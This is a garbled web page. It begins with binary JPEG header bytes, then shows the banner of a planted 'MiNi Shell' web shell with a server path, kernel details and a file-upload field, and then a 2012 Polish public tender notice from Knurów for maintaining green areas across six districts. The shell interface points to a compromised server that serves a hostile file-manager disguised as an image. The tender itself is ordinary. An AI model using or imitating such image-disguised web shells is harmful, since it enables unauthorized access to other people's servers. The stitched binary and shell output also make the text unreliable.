JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120320/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120320/86510-N-2012.html

<p class="kh_header"><b>Knurów: Usługa kompleksowego utrzymania i konserwacji terenów zielonych z podziałem miasta na 6 rejonów</b><br>
<b>Numer ogłoszenia: 86510 - 2012; data zamieszczenia: 20.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Knurów , ul. dr. Floriana Ogana 5, 44-190 Knurów, woj. śląskie, tel. 32 3392308, faks 32 2351521, 3392292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.knurow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa kompleksowego utrzymania i konserwacji terenów zielonych z podziałem miasta na 6 rejonów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje wykonanie usług kompleksowego utrzymania i konserwacji terenów zielonych z podziałem miasta na 6 rejonów:
1.1.Rejon nr 1 o pow.11,00 ha (os. WP II), w tym:
a)Plac 700-lecia przy ul. Al. Lipowej
b)Zieleń pom. ul. Al. Lipową a MSP nr 7 i 9
c)Zieleń wzdłuż ciągów pieszych:
 ul. Witosa
 ul. Lotników-Sikorskiego
 WP I-WP II 
d)Przejście łączące ul. Witosa z ciągiem pieszym Witosa
e)Zieleń przy ul. Piłsudczyków i Dyw. Kościuszkowskiej
f)Pas zieleni wzdłuż ul.1 Maja (od Al. Lipowej do Kosmonautów)
g)Zieleń pomiędzy ul.1 Maja-Marynarzy
h)Ciąg zieleni wzdłuż ul. 26 Stycznia
Zakres usług:
koszenie trawników - 4-ro krotne pow.		- 40.000 m2 
koszenie trawników - 6-cio krotne pow. 		- 54.666 m2
pielęgnacja żywopłotu miękkiego 3 razy 		- 1.640 m2
wiosenne wygrabienie trawników z zanieczyszczeń, 
wywóz i utylizacja odpadów 		- 54.666 m2
jesienne grabienie liści i wywóz j/w (bez placu 700-lecia ) 		- 65.066 m2
renowacja trawników, likwidacja przedeptów	- 300 m2
pielęgnacja drzew piennych (łącznie z kontrolą wymianą wiązadeł 
oraz uszkodzonych lub brakujących palików) 		- 55 szt 
pielęgnacja drzew i krzewów iglastych 		- 26 szt
opryski iglaków (świerków) przeciwko przędziorkowi 		- 26 szt 
opryski iglaków (świerków) przeciwko mszycy świerkowej 		- 26 szt 
odmłodzenie krzewów o średnicy pow. 2m -3 razy 		- 4 szt
odmłodzenie krzewów o średnicy do 2m -3 razy 		- 5 szt
pielęgnacja krzewinek 		- 30 szt 
usuwanie odrostów  przy i z drzew 		- 12 szt
bieżące utrzymanie terenu 		- 110.000 m2
zamiatanie nawierzchni  drogi dojazdowej, chodników i miejsc postojowych 1 raz w tygodniu w m-cach V-XI	- 3.604 m2
malowanie ławek 		- 15 szt
naprawa ławek, uzupełnienie siedzisk , oparć 
i dybli (deski sosnowe) 		- 12 szt kpl. 
1.2.Rejon nr 2  o pow. 7,20 ha (os. WP I) w tym : 
a)Zieleń ul. Szpitalna-Batorego
b)Zieleń  wzdłuż ul.Mieszka I (od ul. Kosmonautów do Kazimierza Wielkiego)
c)Zieleń wzdłuż ul.Kosmonautów i Szpitalnej do Ułanów
d)Teren pomiędzy ul.Kosmonautów 1-11
e)Zieleń przy ul.Armii  Krajowej
f)Zieleń wzdłuż ul.Szpitalnej (od Ziętka do Intermarche)
g)Zieleń od ul.Szpitalnej do Sikorskiego
h)Zieleń wzdłuż ul.Ułanów i MSP Nr 9
i)Teren zielony /oczko/
j)Teren przy ul.Jedności Narodowej
Zakres usług :
koszenie trawników - 6-cio krotne pow.				-63.366 m2
odmłodzenie  żywopłotu miękkiego 3 razy				-1.410 m2 
odmłodzenie krzewów o średnicy do 2m - 3 razy 			-63 szt
wiosenne wygrabienie trawników,wywóz
i utylizacja odpadów							-63.366 m2 
renowacja trawników,likwidacja przedeptów 			-350 m2
;pielęgnacja drzew  (łącznie z kontrolą  i wymianą wiązadeł oraz uszkodzonych lub brakujących palików)						- 164 szt 
pielęgnacja krzewów iglastych					-90 szt
pielęgnacja krzewów ozdobnych					-464 szt
mulczowanie kwietników korą  do 5 cm grubości			 -183 m2
opryski iglaków (świerków) przeciwko przędziorkowi		-147 szt 
opryski iglaków (świerków) przeciwko mszycy świerkowej		- 147 szt 
jesienne grabienie liści, wywóz i utylizacja odpadów		 - 63.366 m2
bieżące utrzymanie czystości terenu łącznie z parkingiem, 
ciągami pieszymi, chodnikami, placem wypoczynkowym		-72.000 m2
odchwaszczenie ścieżki żwirowej- 2 razy 				- 156 m2
odchwaszczenie ciągów pieszych, ścieżek
i placu wypoczynkowego 						-8161 m2
zamiatanie nawierzchni parkingów i chodników opaskowych 	-2651,8 m2
zamiatanie ciągów pieszych,ścieżek i placu wypoczynkowego	-8161 m2
pielęgnacja kwietnika obsadzonego krzewinkami 			-34 m2
pielęgnacja krzewów liściastych wzdłuż hydroforowni 		-165 szt
pielęgnacja kwietnika obsadzonego różami				 -494 szt
dowóz ziemi urodzajnej do róż i jej rozplantowanie 		-5 m3
pielęgnacja krzewów liściastych (tawuł)				-210 m2
malowanie ławek							 -35 szt
mycie ławek  z PCV							 -16 szt
naprawa ławek,uzupełnianie
siedzisk lub oparć (deski sosnowe)					-30 szt
1.3.Rejon nr 3  o pow. 7,0 ha (os. 1000-lecia i Redyna) w tym : 
a)Zieleń  wzdłuż ul.1 Maja, pomiędzy ul.Kazimierza Wielkiego a ul.Wilsona
b)Place zabaw przy ul.Mieszka I i Chrobrego
c)Zieleń wzdłuż ul.K.Wielkiego i S.Batorego
d)Zieleń pomiędzy budynkami ul.Batorego 8-10 i Jagiełły 7
e)Ciąg ul.Mieszka I i Mieszka I boczna (od Kazimierza Wielkiego do Dąbrowskiego)
f)Zieleń pomiędzy ul.Batorego i Kosmonautów
g)Zieleń przed budynkiem K.Wielkiego 2 i trawnik wzdłuż parkingu targowiska
h)Zieleń na os.Redyna
i)Zieleń w ul.Szpitalnej i Floriana 
j)Teren przy przepompowni ul.Wilsona i Wilsona 15
k)Teren pomiędzy ul.Szpitalną-Wilsona
Zakres usług :
koszenie trawników - 6-cio krotne pow.				-35.560 m2
koszenie trawników 4-ro krotne pow.				-29.591 m2
odmłodzenie żywopłotu miękkiego 3 razy				 -5740 m2 
odmłodzenie krzewów o średnicy do 2m - 3 razy			-26 szt
odmłodzenie krzewów o średnicy pow. 2m - 3 razy		-39 szt
wiosenne wygrabienie trawników,krzewów,parkingów
i żywopłotów, wywóz i utylizacja odpadów				 -48.680 m2
renowacja trawników, likwidacja przedeptów			-350 m2
pielęgnacja drzew liściastych					-62 szt 
pielęgnacja drzew i krzewów iglastych				-33 szt
opryski iglaków (świerków) przeciwko przędziorkowi		-24 szt
opryski iglaków (świerków) przeciwko mszycy świerkowej		-24 szt
jesienne grabienie liści, wywóz i utylizacja odpadów		-48.680 m2
usuwanie odrostów przy i z drzew					- 39 szt
bieżace utrzymanie  terenu 						-70.000 m2
pielęgnacja krzewów liściastych 					-105 szt
pielęgnacja krzewów róży pomarszczonej				-110 szt 
malowanie ławek							 - 45 szt
naprawa ławek,uzupełnianie siedzisk lub oparć			-30 szt
zamiatanie parkingu 1 raz w tygodniu w okresie V-X		-1080 m2
zamiatanie chodników,alejek zatok parkingowych
1 raz w tygodniu  w okresie V-XI					- 2605 m2
1.4.Rejon nr 4  o pow. 5,5 ha (tereny zielone pomiędzy ul. Ogana i Koziełka) w tym: 
a)Zieleń  przy ul.Dworcowej 2-10
b)Park przy ul.Ogana
c)Teren przy ul.Floriana
d)Zieleń pomiędzy ul.1 Maja-Klasztorną
e)Zieleń pomiędzy ul. Klasztorną -Koziełka
f)Zieleń przy ul.Wilsona 3-5 
Zakres usług :
koszenie trawników 5-cio krotne pow. 				-50.570 m2
odmłodzenie żywopłotu miękkiego 3 razy				-1620 m2
odmłodzenie krzewów o śr. korony do 2 m - 3razy			-188 szt
pielęgnacja róż							-95 szt
pielęgnacja drzew piennych						-80 szt 
pielęgnacja drzew f.naturalnej					-25 szt
pielęgnacja drzew iglastych						-8 szt
opryski iglaków (świerków) przeciwko przędziorkowi		-8 szt
opryski iglaków (świerków) przeciwko mszycy świerkowej		-8 szt
usuwanie odrostów przy i z drzew 					-20 szt
wiosenne wygrabienie trawników, wywóz i utylizacja odpadów	 -50.570 m2
pielęgnacja krzewów  ozdobnych					-87 szt
pielęgnacja rododendronów						-13 szt
jesienne grabienie liści i wywóz j/w					-55.200 m2
bieżące utrzymanie terenu						-55.200 m2
oczyszczenie nawierzchni ciągów pieszych z ziemi,
odkrycie obrzeży							-2170 m2
zamiatanie chodników,ciągów pieszych i schodów			-4536 m2
odchwaszczanie chodników, ciągów pieszych i schodów		-4536 m2
malowanie ławek farbą olejną					-56 szt
malowanie ławek lakierobejcą					-6 szt
naprawa ławek,uzupełnianie
siedzisk lub oparć i dybli (deski sosnowe)				-50 szt kpl.
1.5.Rejon nr 5 o pow. 2,80 ha (tereny zielone pomiędzy ul. Niepodległości, Dworcową i Koziełka) w tym: 
a)Zieleniec przy ul.Dworcowej (n/p stadionu)
b)Zieleniec przy ul.Dworcowej (z pomnikiem Powstańców Śl.)
c)Zieleniec i ciąg zieleni przy ul.Niepodległości 
d)Zieleniec przy ul.Dworcowej-Kopalnianej
e)Skwer przy ul.Plac Powstańców Śląskich
f)Nieczynny cmentarz  przy ul.Koziełka
Zakres usług :
koszenie trawników - 6-ro krotne pow.				- 15.900 m2
odmłodzenie  żywopłotu miękkiego 3 razy 				-150 m2
odmłodzenie krzewów o śr. korony do 2m-3 razy			-3 szt
pielęgnacja róż							-368 szt
oprysk róż na mszyce						-368 szt
oprysk róż na choroby grzybowe					-368 szt
jesienne wapnowanie róż						-368 szt
pielęgnacja krzewów liściastych					-4057 szt
pielęgnacja różaneczników						-39 szt
pielęgnacja drzew i krzewów iglastych				-658 szt
pielęgnacja kwietników obsadzonych bylinami			-90 m2
uzupełnienie do 5cm warstwy kory pod krzewami			-1124 m2
wiosenne wygrabienie trawników i krzewów z liści,
wywóz  i utylizacja odpadów z pow.					-17.024 m2
jesienne grabienie liści  i wywóz j/w					-28.000 m2
pielęgnacja krzewów ozdobnych-3 rok po wysadzeniu		-1242 szt
pielęgnacja liliowca ogrodowego					-491 szt 
pielęgnacja drzew piennych						-78 szt
pielęgnacja drzew formy  naturalnej					-2 szt
usuwanie odrostów przy i z drzew					-53 szt
bieżące utrzymanie terenu						-28.000 m2
zamiatanie chodników, alejek,ciągów pieszych, schodów,pochylni,
nawierzchni z kostki, miejsc postojowych, wysepek wyłączeniowych -10.126 m2
odchwaszczanie chodników,alejek, schodów, ciągów 
pieszych , nawierzchni z kostki  2 razy				-7399 m2
malowanie ławek farbą olejną					-29 szt
malowanie ławek lakierobejcą					-59 szt
naprawa ławek,uzupełnianie
siedzisk, oparć i dybli (deski sosnowe) 				-35 szt kpl.
1.6.Rejon Nr 6 o pow. 9,0 ha (os. Krywałd i Szczygłowice) w tym: 
a)Zieleniec w ul.Michalskiego
b)Zieleń w ul.Al.Piastów
c)Skwer przy ul.Staszica
d)Teren przy ul.Sztygarskiej
e)Zieleniec przy ul.Lignozy
f)Skwer przy ul.Parkowej
g)Teren pomiędzy ul.Parkową i Kilińskiego
h)Teren przy ul.Żeromskiego
i)Park przy ul.Parkowej
Zakres usług :
koszenie trawników - 3 krotne					-3200 m2
koszenie trawników - 5-cio krotne pow.				-56.100 m2
koszenie trawników - 6-cio krotne 					-17.490 m2
odmłodzenie  żywopłotu miękkiego 3 razy				 -3.100 m2
odmłodzenie żywopłotu miękkiego 1 raz				-800 m2
odmłodzenie żywopłotu twardego 1 raz				-150 m2
odmłodzenie krzewów o śr. korony do 2m-3 razy			-12 szt
odmłodzenie krzewów o śr. korony pow.2m-3 razy			-10 szt
przycięcie krzewów starszych-					-20 m2
wiosenne wygrabienie trawników,krzewów, wywóz
i utylizacja odpadów z pow.						-78.129 m2
jesienne grabienie liści  i wywóz j/w					-89.796 m2
pielęgnacja drzew piennych i f.naturalnej				-17 szt
usuwanie odrostów przy i z drzew niezależnie
od grubości drzewa							-80 szt
pielęgnacja krzewów (berberysy)					-40 szt
wykaszanie jednorocznych odrostów drzew				-350 m2
zamiatanie nawierzchni z kostki i asfaltobetonowej			-9075 m2
bieżące utrzymanie terenu						-90.000 m2
malowanie ławek farbą olejną					-46 szt
malowanie ławek lakierobejcą					-31 szt
naprawa ławek,uzupełnianie
siedzisk, oparć i dybli (deski sosnowe) 				-40 szt kpl.
2.Przedmiot zamówienia został szczegółowo określony w następujących załącznikach do projektów umów dotyczących poszczególnych rejonów: 
2.1.załącznik nr 1 - Opis przedmiotu zamówienia,
2.2.załącznik nr 2 - Wykaz obiektów zieleni z charakterystyką ogólną - dla danego rejonu,
2.3.załącznik nr 3 - Harmonogram realizacji usług - dla danego rejonu,
2.4.załącznik nr 4 - Formularz kosztorysu ofertowego - dla danego rejonu,
2.5.załącznik nr 5 - Wytyczne wykonania i odbioru usług związanych z konserwacją
i utrzymaniem terenów zieleni miejskiej - dla danego rejonu
3.Niniejsze postępowanie stanowi jedną z części zamówienia dotyczącego utrzymania zieleni w Gminie Knurów, z których każda część stanowi przedmiot odrębnego postępowania o łącznej wartości szacunkowej /wraz z przewidywanymi zamówieniami uzupełniającymi/ wynoszącej 724.319,80 zł, co stanowi 180.196,96 euro..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Zamawiający zastrzega sobie możliwość udzielenia zamówień uzupełniających na podsta­wie art. 67 ust. 1 pkt. 6 pzp realizatorowi zamówienia zgodnych z przedmiotem zamówie­nia i stanowiących nie więcej niż 20 % jego wartości. 
2.Zamówienie, o którym mowa powyżej może zostać udzielone nie później niż w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.00.00-6, 77.31.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający wymaga wykazania w wykazie usług co najmniej 2 usług polegających na pielęgnacji zieleni (koszenie trawników, pielęgnacja żywopłotów, róż, krzewów, itp.), o wartości brutto minimum 50.000,00 zł każda, wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. W celu potwierdzenia spełnienia warunku wykonawca może wykazać się usługami wykonywanymi (w trakcie realizacji). W takim przypadku zrealizowana wartość usługi, na dzień składania ofert winna być nie mniejsza niż 50.000,00 zł brutto.
Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami (wiedzą i doświadczeniem) niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów (wiedzy i doświadczenia) na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający wymaga wskazania w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia 1 osoby na stanowisko kierownika prac tj. odpowiedzialnej za świadczenie usług, kontrolę jakości
i kierowania pracami - posiadającej minimum średnie wykształcenie ogrodnicze, architektury krajobrazu lub rolnicze.
Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował osobami zdolnymi do wykonania zamówienia niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych osób zdolnych do wykonania zamówienia na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 2.Wykonawca polegający na wiedzy i doświadczeniu innych podmiotów przedstawia w oryginale pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę istotnych postanowień umowy zawartej w wyniku niniejszego postępowania w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadkach wskazanych we wzorze umowy stanowiącym załącznik do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
